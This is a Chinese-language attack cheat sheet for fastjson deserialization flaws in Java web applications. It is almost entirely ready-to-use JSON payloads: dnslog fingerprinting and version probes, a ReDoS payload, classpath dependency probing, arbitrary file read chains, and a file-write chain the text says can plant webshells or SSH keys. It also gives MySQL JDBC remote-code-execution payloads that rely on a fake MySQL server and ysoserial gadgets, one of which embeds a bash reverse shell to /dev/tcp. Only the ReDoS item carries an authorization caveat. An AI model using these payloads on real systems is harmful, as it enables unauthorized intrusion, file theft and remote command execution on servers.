                指纹探测
报错
传入不合法的 JSON 数据(如单个 `{` 或 `[`)会触发解析报错;如果目标把异常信息回显到响应中,报错内容(如 `com.alibaba.fastjson.JSONException`)可用于判断后端使用的是 fastjson。

不存在的类(`@type` 指向一个不存在的类,观察报错信息是否带有 fastjson 特征)

dnslog
可以在传入 JSON 数据的地方通过 dnslog 探测是否能触发 fastjson 反序列化:下面的 payload 借助 `java.net.Inet4Address`/`InetAddress`/`URL` 等类在反序列化时发起域名解析,dnslog 收到请求即说明 `@type` 被处理了。前提是目标能向外发起 DNS 解析,否则 dnslog 无记录并不代表不存在问题。
 | {"aa":{"@type":"java.net.Inet4Address","val":"dnslog"}}
 {"aa":{"@type":"java.net.Inet6Address","val":"dnslog"}}
 {"@type":"java.net.InetSocketAddress"{"address":,"val":"lo32ps.dnslog.cn"}}
 {"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://11.kaitr5.dnslog.cn"}}""}
 Set[{"@type":"java.net.URL","val":"http://w7ln1u.dnslog.cn"}]
 
 Set[{"@type":"java.net.URL","val":"http://l4t0t0.dnslog.cn"}
 
 
 
 
 {{"@type":"java.net.URL","val":"http://dnslog.com"}:"a"}
 
 
 {"aa":{"@type":"java.net.InetAddress","val":"vbiyxs.dnslog.cn"}}
 
 
 
 | [{
 "@type": "java.lang.AutoCloseable",
 "@type": "java.io.ByteArrayOutputStream"
 },
 {
 "@type": "java.io.ByteArrayOutputStream"
 },
 {
 "@type": "java.net.InetSocketAddress"
 {
 "address":,
 "val": "11.a0y6ja.dnslog.cn"
 }
 }
 ]
 
 | {"@type": "java.lang.Exception",
 "@type": "com.alibaba.fastjson.JSONException",
 "x": {
 "@type": "java.net.InetSocketAddress"{
 "address": ,
 "val": "2.tuai7j.dnslog.cn"
 }
 }
 }
 
版本探测
dnslog
 | {{"@type":"java.net.URL","val":"http://dnslog.com"}:"a"}
 
 
 | {"aa":{"@type":"java.net.InetAddress","val":"vbiyxs.dnslog.cn"}}
 
 [
 {
 "@type": "java.lang.Class",
 "val": "java.io.ByteArrayOutputStream"
 },
 {
 "@type": "java.io.ByteArrayOutputStream"
 },
 {
 "@type": "java.net.InetSocketAddress"
 {
 "address":,
 "val": "dnslog"
 }
 }
 ]
 
 | [
 {
 "@type": "java.lang.Exception",
 "@type": "com.alibaba.fastjson.JSONException",
 "x": {
 "@type": "java.net.InetSocketAddress"
 {
 "address":,
 "val": "ccc.4fhgzj.dnslog.cn"
 }
 }
 },
 {
 "@type": "java.lang.Exception",
 "@type": "com.alibaba.fastjson.JSONException",
 "message": {
 "@type": "java.net.InetSocketAddress"
 {
 "address":,
 "val": "ddd.4fhgzj.dnslog.cn"
 }
 }
 }
 ]
 
报错
 | {"@type":"java.lang.AutoCloseable"{"z":{"@type":"java.lang.AutoCloseable"
 a
 ["test":1]
 [
 
 
这种方法的版本回显不一定准确:测试发现 1.2.77–1.2.80 的回显均为 1.2.76。版本号来自异常信息,只有目标把报错回显到响应中时才可用;建议结合下面按版本区间表现不同的报错/不报错 payload 交叉验证。


 | 【不报错】1.2.83/1.2.24
 【报错】1.2.25-1.2.80
 {"zero":{"@type":"java.lang.Exception","@type":"org.XxException"}}
 
 【不报错】1.2.24-1.2.68
 【报错】1.2.70-1.2.83
 
 {"zero":{"@type":"java.lang.AutoCloseable","@type":"java.io.ByteArrayOutputStream"}}
 
 【不报错】1.2.24-1.2.47
 【报错】1.2.48-1.2.83
 
 {
 "a": {
 "@type": "java.lang.Class",
 "val": "com.sun.rowset.JdbcRowSetImpl"
 },
 "b": {
 "@type": "com.sun.rowset.JdbcRowSetImpl"
 }
 }
 
1.2.36–1.2.62 正则拒绝服务(ReDoS,而非 DDoS):`$ref` 中的 JSONPath `rlike` 会在服务端执行正则,构造会产生回溯爆炸的表达式可使解析线程长时间占用 CPU。这是针对目标的拒绝服务测试,只应在授权范围内谨慎使用。
 | {
 "regex":{
 "$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
 },
 "blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
 }
 
探测是否开启 autoType:思路是第一个元素 `java.net.CookiePolicy` 不在默认白名单中,只有 autoType 开启时才会继续解析到第二个元素并触发 dnslog;对比两种情况下 dnslog 是否收到请求即可判断。
 | [{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"ydk3cz.dnslog.cn"}]
开启时(dnslog 收到解析请求)

未开启(dnslog 无解析请求)

依赖探测
 | org.springframework.web.bind.annotation.RequestMapping
 org.apache.catalina.startup.Tomcat
 groovy.lang.GroovyShell
 com.mchange.v2.c3p0.DataSources
 com.mysql.jdbc.Buffer
 com.mysql.cj.api.authentication.AuthenticationProvider
 com.mysql.cj.protocol.AuthenticationProvider
 sun.nio.cs.GBK
 java.net.http.HttpClient
 org.apache.ibatis.type.Alias
 org.apache.tomcat.dbcp.dbcp.BasicDataSource
 org.apache.tomcat.dbcp.dbcp2.BasicDataSource
 org.apache.commons.io.Charsets
 org.apache.commons.io.file.Counters
 org.aspectj.ajde.Ajde
 
Fastjson ≤ 1.2.47:通过 `java.lang.Character` 的类型转换报错,把要探测的类名回显在异常 message 中,从而判断目标 classpath 上是否存在该依赖(同样需要目标回显报错信息)。
 | {"x": {
 "@type": "java.lang.Character"{
 "@type": "java.lang.Class",
 "val": "org.springframework.web.bind.annotation.RequestMapping"
 }
 }
 

文件读取
FastJson >= 1.2.73 && <= 1.2.80(需要目标 classpath 上存在 aspectjtools,见下面的 pom)
 | <dependency><groupId>org.aspectj</groupId>
 <artifactId>aspectjtools</artifactId>
 <version>1.9.5</version>
 </dependency>
 
此利用方式同上,仅在 Web 端可行:它依赖 fastjson 的缓存机制(前一次请求中加载过的类会被缓存),因此需要向同一进程依次发送下面三段 payload(第一段为 poc1-1,之后是 poc1-2、poc1-3)。
 | {
 "@type":"java.lang.Exception",
 "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
 }
 
 poc1-2
 {
 "@type":"java.lang.Class",
 "val":{
 "@type":"java.lang.String"{
 "@type":"java.util.Locale",
 "val":{
 "@type":"com.alibaba.fastjson.JSONObject",
 {
 "@type":"java.lang.String"
 "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
 "newAnnotationProcessorUnits":[{}]
 }
 }
 }
 
 poc1-3
 {
 "@type":"java.lang.Character"
 {
 "c":{
 "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
 "@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
 "fileName":"c:/windows/win.ini"
 }
 }
 
 
mysql jdbc
 | <dependency><groupId>mysql</groupId>
 <artifactId>mysql-connector-java</artifactId>
 <version>8.0.19</version>
 </dependency>
 
payload
 | {"@type": "java.lang.AutoCloseable",
 "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
 "proxy": {
 "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
 "connectionUrl": {
 "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
 "masters": [
 {
 "host": "127.0.0.1"
 }
 ],
 "slaves": [],
 "properties": {
 "host": "192.168.100.128",
 "user": "ssrf",
 "dbname": "dbname",
 "password": "pass",
 "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
 "autoDeserialize": "true",
 "allowLoadLocalInfile": "true"
 }
 }
 }
 }
 
 
需要 MySQL_Fake_Server(Python 3.8)。fake server 根据客户端连接时的 username 分发不同的 payload,因此通过 `user` 字段选择要触发的 payload。注意目标需要能访问攻击者的 MySQL 端口(出网),且 `autoDeserialize=true` 意味着客户端会直接反序列化服务端返回的数据。

commons-io 任意文件读取(fastjson <= 1.2.80)
pom
 | <dependency><groupId>commons-io</groupId>
 <artifactId>commons-io</artifactId>
 <version>2.11.0</version>
 </dependency>
 
 
payload
 | {"abc": {
 "@type": "java.lang.AutoCloseable",
 "@type": "org.apache.commons.io.input.BOMInputStream",
 "delegate": {
 "@type": "org.apache.commons.io.input.ReaderInputStream",
 "reader": {
 "@type": "jdk.nashorn.api.scripting.URLReader",
 "url": "file:///D:/test/1.txt"
 },
 "charsetName": "UTF-8",
 "bufferSize": 1024
 },
 "boms": [{
 "charsetName": "UTF-8",
 "bytes": [49]
 }]
 },
 "address": {
 "$ref": "$.abc.BOM"
 }
 }
 
有输出表示文件第一个字节与 `boms` 中给定的 `bytes` 匹配(此处 49 即字符 `1`),不匹配则无输出——本质是按字节的布尔盲注,依赖响应中能区分有无输出。


`boms` 可以给多个候选,每次请求逐个字节爆破。注意 `jdk.nashorn.api.scripting.URLReader` 依赖 JDK 自带的 Nashorn(JDK 15 起已移除),目标 JDK 版本过高时该链不可用。

写文件
知道 Web 路径时可以写 webshell;有权限时也可以写 SSH 公钥或计划任务来 getshell。
1.2.37 <= FastJson <= 1.2.83
pom(依赖较多,目标 classpath 需同时具备以下库)
 | <dependency><groupId>com.alibaba</groupId>
 <artifactId>fastjson</artifactId>
 <version>1.2.68</version>
 </dependency>
 
 <dependency>
 <groupId>org.aspectj</groupId>
 <artifactId>aspectjtools</artifactId>
 <version>1.9.5</version>
 </dependency>
 <dependency>
 <groupId>com.esotericsoftware</groupId>
 <artifactId>kryo</artifactId>
 <version>4.0.0</version>
 </dependency>
 <dependency>
 <groupId>com.sleepycat</groupId>
 <artifactId>je</artifactId>
 <version>5.0.73</version>
 </dependency>
 
poc(`buffer` 为 base64 编码的写入内容,`position` 为其字节长度——示例中 `YjF1M3I=` 解码后为 5 字节;`targetPath`/`tempPath` 分别为目标路径与临时路径)
 | {"stream": {
 "@type": "java.lang.AutoCloseable",
 "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
 "targetPath": "d:/test/pwn.txt",
 "tempPath": "d:/test/test.txt"
 },
 "writer": {
 "@type": "java.lang.AutoCloseable",
 "@type": "com.esotericsoftware.kryo.io.Output",
 "buffer": "YjF1M3I=",
 "outputStream": {
 "$ref": "$.stream"
 },
 "position": 5
 },
 "close": {
 "@type": "java.lang.AutoCloseable",
 "@type": "com.sleepycat.bind.serial.SerialOutput",
 "out": {
 "$ref": "$.writer"
 }
 }
 }
 
 
JDBC rce
MYSQL JDBC
需要探测依赖(目标 classpath 上需存在 MySQL JDBC 驱动;下列类名可用于区分驱动版本)
 | com.mysql.jdbc.Buffer
 com.mysql.cj.api.authentication.AuthenticationProvider
 com.mysql.cj.protocol.AuthenticationProvider
 
需要 Fake MySQL Server 联动 ysoserial。fake server 按客户端 username 选择 payload,命令格式为 `yso_<gadget>_<参数>`:例如 `java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://xx.xxxxx.ceye.io` 对应的 user 就是 `yso_URLDNS_http://11.82m3mf.dnslog.cn`。反序列化链需要目标 classpath 上存在对应的 gadget 依赖(如下文的 commons-collections4)。
mysql-connector-java 8.0.19
 | <dependency><groupId>mysql</groupId>
 <artifactId>mysql-connector-java</artifactId>
 <version>8.0.19</version>
 </dependency>
 
payload:可以先用 URLDNS 链配合 dnslog 确认目标会连接 fake server 并反序列化返回数据,再换成命令执行链。
 | {"@type": "java.lang.AutoCloseable",
 "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
 "proxy": {
 "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
 "connectionUrl": {
 "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
 "masters": [
 {
 "host": "192.168.100.128"
 }
 ],
 "slaves": [],
 "properties": {
 "host": "192.168.100.128",
 "user": "yso_URLDNS_http://11.82m3mf.dnslog.cn",
 "dbname": "dbname",
 "password": "pass",
 "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
 "autoDeserialize": "true",
 "allowLoadLocalInfile": "true"
 }
 }
 }
 }
 
这里把 `ReplicationMySQLConnection` 换成 `MultiHostMySQLConnection` 或 `LoadBalancedMySQLConnection` 都不影响利用。
反弹shell
 | {"@type": "java.lang.AutoCloseable",
 "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
 "proxy": {
 "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
 "connectionUrl": {
 "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
 "masters": [
 {
 "host": "192.168.100.128"
 }
 ],
 "slaves": [],
 "properties": {
 "host": "192.168.100.128",
 "user": "yso_FastJson1_bash -i >& /dev/tcp/ip/port 0>&1",
 "dbname": "dbname",
 "password": "pass",
 "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
 "autoDeserialize": "true",
 "allowLoadLocalInfile": "true"
 }
 }
 }
 }
 
目标存在 CommonsCollections4(版本 4.0)时
 | <dependency><groupId>mysql</groupId>
 <artifactId>mysql-connector-java</artifactId>
 <version>8.0.19</version>
 </dependency>
 <dependency>
 <groupId>org.apache.commons</groupId>
 <artifactId>commons-collections4</artifactId>
 <version>4.0</version>
 </dependency>
 
 
cc4 payload
 | {"@type": "java.lang.AutoCloseable",
 "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
 "proxy": {
 "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
 "connectionUrl": {
 "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
 "masters": [
 {
 "host": "192.168.100.128"
 }
 ],
 "slaves": [],
 "properties": {
 "host": "192.168.100.128",
 "user": "yso_CommonsCollections4_calc",
 "dbname": "dbname",
 "password": "pass",
 "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
 "autoDeserialize": "true",
 "allowLoadLocalInfile": "true"
 }
 }
 }
 }
 
cc2 payload
 | {"@type": "java.lang.AutoCloseable",
 "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
 "proxy": {
 "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
 "connectionUrl": {
 "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
 "masters": [
 {
 "host": "192.168.100.128"
 }
 ],
 "slaves": [],
 "properties": {
 "host": "192.168.100.128",
 "user": "yso_CommonsCollections2_calc",
 "dbname": "dbname",
 "password": "pass",
 "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
 "autoDeserialize": "true",
 "allowLoadLocalInfile": "true"
 }
 }
 }
 }
 
mysql5
5.1.x 可 SSRF(让目标连接攻击者的 MySQL);5.1.11–5.1.48 可走反序列化链(`autoDeserialize` + `ServerStatusDiffInterceptor`)。
 | <dependency><groupId>mysql</groupId>
 <artifactId>mysql-connector-java</artifactId>
 <version>5.1.12</version>
 </dependency>
 <dependency>
 <groupId>org.apache.commons</groupId>
 <artifactId>commons-collections4</artifactId>
 <version>4.0</version>
 </dependency>
 
cc4
 | {"@type": "java.lang.AutoCloseable",
 "@type": "com.mysql.jdbc.JDBC4Connection",
 "hostToConnectTo": "192.168.100.128",
 "portToConnectTo": 3306,
 "info": {
 "user": "yso_CommonsCollections4_calc",
 "password": "pass",
 "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
 "autoDeserialize": "true",
 "NUM_HOSTS": "1"
 },
 "databaseToConnectTo": "dbname",
 "url": ""
 }
 
cc2
 | {"@type": "java.lang.AutoCloseable",
 "@type": "com.mysql.jdbc.JDBC4Connection",
 "hostToConnectTo": "192.168.100.128",
 "portToConnectTo": 3306,
 "info": {
 "user": "yso_CommonsCollections2_calc",
 "password": "pass",
 "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
 "autoDeserialize": "true",
 "NUM_HOSTS": "1"
 },
 "databaseToConnectTo": "dbname",
 "url": ""
 }
 
mysql6
6.0.2/6.0.3(反序列化链)
 | <dependency><groupId>mysql</groupId>
 <artifactId>mysql-connector-java</artifactId>
 <version>6.0.2</version>
 </dependency>
 <dependency>
 <groupId>org.apache.commons</groupId>
 <artifactId>commons-collections4</artifactId>
 <version>4.0</version>
 </dependency>
 
cc4
 | {"@type":"java.lang.AutoCloseable",
 "@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
 "proxy": {
 "connectionString":{
 "url":"jdbc:mysql://192.168.100.128:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc"
 }
 }
 }
 
cc2
 | {"@type":"java.lang.AutoCloseable",
 "@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
 "proxy": {
 "connectionString":{
 "url":"jdbc:mysql://192.168.100.128:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections2_calc"
 }
 }
 }
 